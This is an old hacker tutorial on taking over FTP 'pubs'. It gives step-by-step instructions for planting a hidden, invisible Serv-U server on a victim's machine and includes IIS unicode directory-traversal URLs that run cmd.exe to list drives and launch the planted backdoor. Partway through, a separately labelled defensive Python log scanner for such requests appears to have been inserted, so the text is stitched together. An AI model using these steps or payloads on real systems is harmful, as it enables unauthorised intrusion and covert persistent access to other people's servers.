Pub Haxoring ***Private*** Tutorial
(C) WX2 Productions
Note:
I don't care what you do with this information, and I don't care if
you go to jail. If you have no idea what this is about then you shouldn't
be reading it anyways. Like... if you don't know what a pub is then stop
reading right now.... and since this is the private version I sure hope
you know what a pub is.
Requirements:
Firstly, if you are reading this 'private' version you should understand
that you may ***not*** distribute it in any way, if you do and if I
catch you, you will pay ;)
Secondly, to find pubs that you can haxor you are going to need a big list
of pubs. To get these you can use programs like grim's ping, or for you
more advanced people, an IIS scanning program.
Thirdly, you will probably want some proxies to use. If you use grims
ping to scan you should be able to find a ton of wingates. And you can
find http proxies anywhere.
Serv-U set-up:
I like 2.5 and think that 3.0 is evil, but use whatever works for you.
You'll want it 2 run 'hidden'; in 3.0 that is easier than in 2.5, but 3.0
is evil ;) You will want it running on a port other than 21, maybe
say port 1023. When you set it up, just like install it on your comp,
and do all the settings that way. You will want to set it to run as
a system service, and you'll want 'invisible mode'. In servu 2.5:
StartIconic=Yes
StartMaximized=No
Invisible=Yes
should be in your serv-u.ini file. If not, add them. In servu 3.0:
just make sure you only upload the servudaemon.exe and the
servudaemon.ini filez. Then it will automatically run 'hidden'
Haxoring
----------
First step:
The first thing to do once you have a big list of pubs is to put all their
ip's in your browser. If a site loads (even an under construction page)
then itz a possible choice. If nothing loads then move on.
Second step:
Once you find a pub that also has a web site running on the same computer
connect to it. If when you connect you see some html filez like main.htm
and index.html and maybe a default.asp, then you have a good chance of
being able to haxor this site. Make sure you have upload permission by
uploading a tmp file. If it works move on to step 3. If not, then look
around and see if you can find other folders that have html content that
you can upload to. If you see no folders with html stuff in them, or
you have no upload permission, then you are going to have to try another
one. (See advanced techniques for other ways to do this)
Third step:
Upload space.asp (it comes with grims ping) and try and load it off
their website (http://1.2.3.4/space.asp). If it loads, you will
get a listing of their HD space. If not, your last hope will be
the IIS hak in advanced techniques.
Fourth step:
Upload serv-u (serv-u.exe and serv-u.ini or servudaemon.exe and
servudaemon.ini) to the folder you found in step 2. Now go to your
browser and type in 'http://1.2.3.4/serv-u.exe' where 1.2.3.4 is the ip of
the site you are haxoring. If it just goes for a long time and nothing
seems to happen go back to your ftp program and try connecting to the
port you set serv-u to run on. If you connect, then you've successfully
haxored that pub =) If not... what might happen is once you type in the
servu.exe it might think you want to download it and try and send it to you.
There are ways around this; see advanced techniques for more info.
Advanced Techniques:
| IIS hacks |
Say you find a web site, and you can only upload to the 'Incoming' folder.
This is pretty useless if you are trying to haxor a pub right? or is it?
There are a few IIS unicode haks, i'll put one in here (because itz the only
one i know really well).
You can get the whole exploit here:
http://newdata.box.sk/2001/jul/unicode1.txt , but i'll summarize it here.
Take the website (for this example it'll be 1.2.3.4), and put this in
your browser:
http://1.2.3.4/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
If it werks you will get a listing of their C:\ drive. If not you
will get an error. To run stuff use this URL:
http://1.2.3.4/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+call+c:\seru.exe
I think now you get the picture and can go from here =)
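For anyone reviewing web logs for the request shape above (added example, not part of the original tutorial): the URL relies on the path being percent-decoded twice, so %255c becomes %5c and then a backslash. The Python below decodes each logged path until it stops changing and flags multi-encoded paths, decoded ..\ or ../ sequences, and requests for .exe files; the log lines and their field layout are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines, not real traffic.
# Assumed fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = r"""2001-07-14 10:02:11 10.0.0.5 GET /default.asp - 200
2001-07-14 10:02:40 10.0.0.9 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\ 200
2001-07-14 10:03:30 10.0.0.7 GET /images/100%25.gif - 200
2001-07-14 10:04:10 10.0.0.9 GET /incoming/serv-u.exe - 200
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")  # ../ or ..\ after decoding
MAX_ROUNDS = 5                        # bound the decode loop

def fully_decode(path):
    """Percent-decode until the string stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        nxt = unquote(path)
        if nxt == path:
            break
        path, rounds = nxt, rounds + 1
    return path, rounds

def classify(uri_stem):
    """Return a sorted list of reasons this request path deserves review."""
    decoded, rounds = fully_decode(uri_stem)
    reasons = set()
    if rounds > 1:                          # needed more than one decode pass
        reasons.add("multi-encoded")
    if TRAVERSAL.search(decoded):           # parent-directory step in the path
        reasons.add("traversal")
    if decoded.lower().endswith(".exe"):    # executable requested over HTTP
        reasons.add("exe-request")
    return sorted(reasons)

def scan(log_text):
    """Return [(client_ip, uri_stem, reasons)] for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue                        # skip header and malformed lines
        reasons = classify(fields[4])
        if reasons:
            hits.append((fields[2], fields[4], reasons))
    return hits

if __name__ == "__main__":
    for ip, stem, reasons in scan(SAMPLE_LOG):
        print(ip, stem, ",".join(reasons))
```

The /images/100%25.gif line is there to show that a single legitimate %25 is not flagged; only a path that keeps changing after the first decode pass counts as multi-encoded.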
| ASP file stuff |
It runs space.asp nicely and you've uploaded servu, but when you go to run it,
it just tries to d/l it to you. You've also tried the IIS hack, but it doesn't
werk. You are so close, but not quite there. That's what the ASP file hack is
for. Basically if it will run .asp scripts then you can just make a .asp script
that will run servu for you. You will need to know the 'real' path to it, but
you can get that with an .asp file too. I have 2 .asp files that are made just
for this, if you need them just ask (see contact information).
Well... that is basically it. You now have a nicely haxored pub. You may want
to move the servu.exe somewhere else on their HD say in the winnt folder, and
run it again from there.
Contact Information:
If you know where to contact me, feel free to contact me. If not, then too
bad.
Have fun